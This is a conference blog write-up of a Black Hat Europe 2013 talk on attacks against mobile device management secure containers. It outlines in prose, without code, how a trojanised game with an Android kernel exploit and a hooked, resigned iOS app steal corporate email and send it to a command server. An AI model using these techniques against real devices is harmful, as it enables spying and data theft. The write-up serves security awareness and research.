Please consider donating:


BlackHatEU2013 – Day1 – Practical Attacks against MDM solutions

Good morning everyone,

Welcome to BlackHat Europe 2013 !  As announced in my post a couple of days ago, I’ll try to post short write-ups about some of the talks right after the presentation has finished.  All you have to do is keep an eye on my Twitter feed to see when a new post is available.

After enjoying breakfast with @wimremes, @xme, @chrisjohnriley, @halvarflake, @botherder, @repmovsb, @dookie, muts and some others (sorry if I forgot to mention your twitter handle), it’s time for work.   (Yes, attending conferences is not just talks in between the parties… it is hard work ! :) )

Before we begin, I would like to congratulate Offensive Security with the release of Kali Linux, the successor of BackTrack Linux. Check it out at !

The first session that I’m attending today is called “Practical Attacks against MDM solutions”, presented by Daniel Brodie and Michael Shaulov from Lacoon Mobile Security.

Daniel has been a research for almost a decade (PC / Mobile) and has been working on developing a dynamic analysis framework for malware on mobile devices.  Michael is the CEO / co-founder of Lacoon and has done lots of research on feature-phones and smartphones.


An MDM is a policy & configuration tool that helps enterprises manage BYOD and corporate mobile devices. In most cases, it allows separation of business vs private data on these devices by using multiple containers.  Gartner states that in the next few years, 65% of the enterprises will be using MDM solutions to manage their devices.

Key capabilities of an MDM solution include software management, network service management, hardware management and security management (remote wipe, enforce configurations and encryption, if the operating systems allows this).  Most of these tools allow you to detect if the device is jailbroken or not.  MobileIron/AirWatch/FiberLink/Zenprise/Good Technologies are some companies that offer MDM solutions.  Good Technologies was the company that introduced the use of secure containers, Michael says.

Secure containers are just normal applications on the device. They are designed to secure communications between the device and the company, and also provide encrypted storage (actions as some kind of sandbox, using default OS capabilities).

Rise of the Spyphones (RAT – Remote Access/Admin Tools)

Daniel explains that these secure containers attempt to protect against malware which would turn your device into a spyphone. RAT malware target both personal data, or have financial motives.   Mobile devices are a great target because they contain contacts, email and corporate information.

Malware capabilities include Eavesdropping & surround recording, location tracking, extracting call/text logs, access the company LAN via VPN, etc.  FinSpy, DaVinci RCS, LuckyCat and Leo Impact are some examples of malware tools.  Some of them start at 4,99$ per month, and are available for iOS, Android, BlackBerry, Windows, Symbian etc. Some of them even come with professional support and are very user-friendly.  “So simple even your mother can use them”. The difference between the high-end and low-end tools is mostly related with the infection vector.  High-end tools often use 0day vulnerabilities, while the cheaper ones using older bugs.

To see how popular these tools are, Daniel continues, they partnered with worldwide cellular network providers and samples 250K subscribers.  They discoverd that in March of 2012, one out of 3000 devices were infected. In october, this number increased to 1 out of 1000 devices, which is an alarming trend.   The majority of the infections were found on iOS (52%), in a market that is dominated by Android (51%).

Nobody seems to worry about this, because “we have a secure container” right ?

Bypassing secure container encryption capabilities

Secure containers attempt to detect jailbreaking and the installation of rogue applications, and encrypt data.  All of this is based on functionality provided by the OS.  Most jailbreaking/Rooting detection mechanisms are based on publicly known routines. They usually check for the presence of Cydia/SU, but they don’t try to detect the actual exploitation.  If someone is using a custom exploit, the jailbreak detection technique may not work.

The mechanism to prevent the installation of malicious applications have been bypassed in certain cases, so this is not a foolproof protection feature either.

Michael and Daniel continue by demonstrating how the secure container on Android can by bypassed.  The technique is based on the Exynos exploit (released in december 2012), hidden inside a rogue application (pretending to be a little/free game or something like that), which installs a rogue daemon running in the background. In the demo, Daniel shows that this service was able to grab the contents of corporate emails were taken and sent to the C&C server by listening to the event log.   By then accessing the heap (/proc//maps and /mem), they could extract the email contents and send it to the attacker.

On iOS, equipped with the Good Technologies MDM solution, they were also successful at stealing emails that were supposed to be protected by the secure container.  To get the attack to work, the malicious application needs to be installed first. This either requires a jailbroken device, or a signed application that will perform the jailbreak and then hides it.  The technique for iOS first loads the malicious dylib into memory (it’s signed – but increasingly more difficult to do nowadays).  The application was changed using MACH-O editing techniques (using scripts that allow you to resign the application). Then, hooks are placed using standard objective C mechanisms (Objc_setImplementation). These hooks are designed to extract email content from the data passed to the function, send it home, and then call the original function.

Daniel stresses that both attacks demonstrated were not targeted against Good in any way. The exploits are generic and should work against multiple products.

In any case, secure containers rely on the integrity of the host system.  If it’s already compromised, the secure container is no longer secure.  If the host system is not compromised… the secure container doesn’t really provide added value to the end user.


Infection is inevitable, Michael explains.  MDM provides management, but not security. MDM solutions allow you to separate private data from business data and allow you to wipe the enterprise part of the devices, or provide “copy/paste” Data Loss Prevention, but that’s about it.

An MDM can acts as a baseline defence for a multi-layer approach, not as a sole security layer.  Additional protection on the network layer may be required to further secure the devices (IDS/IPS on the network, force the use of VPN, etc).  Michael also explains that most antivirus products are also limited by the sandbox, so they can’t really do proper hooks.  Most AV’s use signature based detection and fail at properly detecting malware.  In fact, since some of these RAT tools claim to be legitimate applications (so you can spy on your kids etc), are simply whitelisted by certain AV products.



© 2013, Peter Van Eeckhoutte (corelanc0d3r). All rights reserved.

Comments are closed.

Corelan Training

We have been teaching our win32 exploit dev classes at various security cons and private companies & organizations since 2011

Check out our schedules page here and sign up for one of our classes now!


Want to support the Corelan Team community ? Click here to go to our donations page.

Want to donate BTC to Corelan Team?

Your donation will help funding server hosting.

Corelan Team Merchandise

You can support Corelan Team by donating or purchasing items from the official Corelan Team merchandising store.

Protected by Copyscape Web Plagiarism Tool

Corelan on Slack

You can chat with us and our friends on our Slack workspace:

  • Go to our facebook page
  • Browse through the posts and find the invite to Slack
  • Use the invite to access our Slack workspace
  • Categories